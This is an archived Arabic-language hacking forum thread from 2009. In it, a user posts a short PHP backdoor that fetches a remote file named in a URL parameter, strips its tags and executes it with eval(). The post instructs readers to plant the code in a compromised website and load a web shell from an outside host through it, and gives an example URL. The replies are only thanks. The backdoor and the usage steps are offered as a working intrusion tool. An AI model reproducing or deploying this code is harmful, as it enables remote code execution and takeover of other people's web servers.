:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/forumdisplay.php?f=38)
-   -   PHP 5.2.* Bypass Remote File Inclusion) (http://www.vbspiders.com/vb/showthread.php?t=16219)

Crazy Dz 07-26-2009 06:14 AM
PHP 5.2.* Bypass Remote File Inclusion)
 
سلام عليكم

كود PHP:
<?php
/*
 ************************
 * Include any File php *
 * PHP (Bypass 5.2.*)   *
 ************************
 * Coded By AL-MoGrM    *
 * T0v@hotmail.Com      *
 ************************
*/
if($_GET[t0v]){
$file=implode("\n",file($_GET[t0v]));
$t0v=str_replace("<?php""",$file);
$t0v=str_replace("<?""",$t0v);
$t0v=str_replace("?>""",$t0v);
eval($t0v);
}
?>


الشرح :- ثغره في php تسمح لك تسحب اي ملف php من خارج السيرفر لان الاصدارات الجديده مانعه السحب
لغم الموقع بالكود هذا واسحب الشل بالطريقه ذي
http://site.com/file.php?t0v=http://...mages/Ex/r.txt

المصدر SecurityReason


harcha 07-26-2009 02:49 PM
شكرا

LAV4 07-26-2009 05:00 PM
الله يجزيك الخير يا اخي

KaLa$nikoV 07-26-2009 05:45 PM
ثانكس

سلفر 07-29-2009 07:55 AM
مشكور اخوي تسلم يديك


الساعة الآن 12:48 AM


[ vBspiders.Com Network ]